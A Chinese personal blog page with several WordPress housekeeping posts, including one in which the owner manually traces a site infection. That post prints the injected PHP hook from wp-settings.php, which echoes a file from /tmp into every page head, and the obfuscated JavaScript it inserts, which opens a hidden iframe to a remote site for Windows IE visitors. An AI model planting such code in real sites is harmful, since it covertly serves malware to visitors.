今天终于把所有的sites都搬到新的服务器上去了...各种凶残的病毒残留痕迹,防不胜防...索性一切wordpress的插件什么的都是重新安装的,哎。
祈求一下,让我清净两天吧。最近事事儿已经够多的了,不要再来了。
Category: Wordpress
Categories
wordpress同步到微博的小提醒
以前落园在用的WP插件:WP-Tsina貌似授权失效了(就这几天的事儿吧,已经在新浪的app平台上搜不到它了),所以一直也就没法同步了。无奈之下,研究了一下sina那边可以用的应用,选了一个叫做WordPress连接微博的插件。花里胡哨的样子其实我不是很喜欢,但是也没有别的更好的选择了,就这样吧。
希望sina不要关闭Ouath授权,现在开放平台上只能找到Ouath2的文档了,害得我开始还很单纯的以为只是API接口的改变、试图去换接口地址呢(后来发现是WP-Tsina的ID已经消失了,哎)。
现在落园可以正常的同步到微博了,还算是唯一值得庆幸的事儿吧。微博一步步收紧之后,不知道还有什么进一步的限制呢?别真的非实名制不能发言啊!
Categories
wordpress之手动查木马侵入
最近两个blog都不消停,总有木马嵌入的报告。是可忍孰不可忍,在今早收到google Webmaster的通知之后,决定彻底的查一下这个感染的原因。
登上FTP,看到wp-settings.php这个文件更新日期和其他的都不一样,就下下他来。然后和标准的安装包自带的wp-settings.php进行比对,果然发现多了这么几行:
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');
遂加了一行echo $t_d. '/wp_inc' ;,华丽丽的发现输出了一个/tmp。这个时候访问blog并查看源文件,发现有一行代码被嵌入:
35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hggf|navigator|ai|showthread|php|72241732'.split('|'),0,{}))
// ]]>
这就是一切祸首的来源!
总结一下,这个木马的入侵模式为:修改wp-settings.php文件,然后调用系统临时文件夹/tmp下的wp_inc文件,然后嵌入到网站的里面,实现JS入侵。
最简单的屏蔽办法自然是覆盖wp-settings.php文件,然后这行代码的嵌入果然消失了,网站也就没问题了。然而最大的问题则是,服务器已经被感染了,他会不断的重写wp-settings.php文件,而且就算我把文件的权限设为600(只读)而不是644也无济于事。这下子,我也不知道应该怎么办了……看了一下google的report,貌似整个服务器上有很多网站都中招了,汗。
Of the 168165 site(s) we tested on this network over the past 90 days, 4491 site(s) served content that resulted in malicious software being downloaded and installed without user consent.
莫非要换服务器了?……又是一年搬家时?
p.s. 发现自己向着下列目标在不懈努力:
上得了厅堂,下得了厨房,写得了代码,查得出异常,杀得了木马,翻得了围墙,开得起好车,买得起新房,斗得过二奶,打得过流氓.
Categories
对落园的一些例行调整
昨天更新了一下PageNavi这个插件,然后发现新版本自己带了一个CSS,导致我原来在模板中定义的样式失效,这也刺激了我去好好休整一下这个四处透风的Wordpress。
+改回来页面导航的样式
+调整了前台页面的文字,把所有不适应国情的英文字符都改为中文了(分家咯)。现在留下的大概只有RSS, Tag这些不好翻译也不用翻译的个别英文了。
+调整了个别位置英文字体的样式,排除了宋体显示英文。
+调整后台目录,使得wordpress可以实现自动升级(已升级至最新版)。由于支持widgets的话对CSS文件需进行较大调整,所以暂且搁置。
+顺手升级了后花园的TextCube,其实我仍然觉得这个是不错的blog系统,不过可能更适应韩国。
-调整模板,去掉自动将半角符号转换为全角符号的函数(可能仅有中文版有此毛病)。
+更新了表情包,由“洋葱头”换成了“胖兔子粥粥”。由于GIF动画图片不足,又加了一些静态的。。
+修正了评论页的一些错误,主要是被密码保护的文章评论页模板问题。
唯一不爽的就算在中文14PX的显示下,英文字体显得很粗糙(Firefox下,可能是没有cleartype支持的缘故)。正文中的英文只能继续这么忍受着了。
Categories
落园遇到技术问题,暂时回复默认主题[已恢复]
对不起诸位,没想到升级了一下2.8.1却遇到了技术问题,目前没有很好的解决办法只能暂时回到默认主题。
Cloudly正在努力的修复中,敬请等待!给您带来的不便,敬请谅解!
[已解决]原来是自动升级惹得祸,覆盖了一些自定义的东西。下次学乖了,再也不“自动升级”了,还是乖乖的下载下来升级包好了。哎,真是一波三折,好在现在似乎没什么问题了。怕怕ing~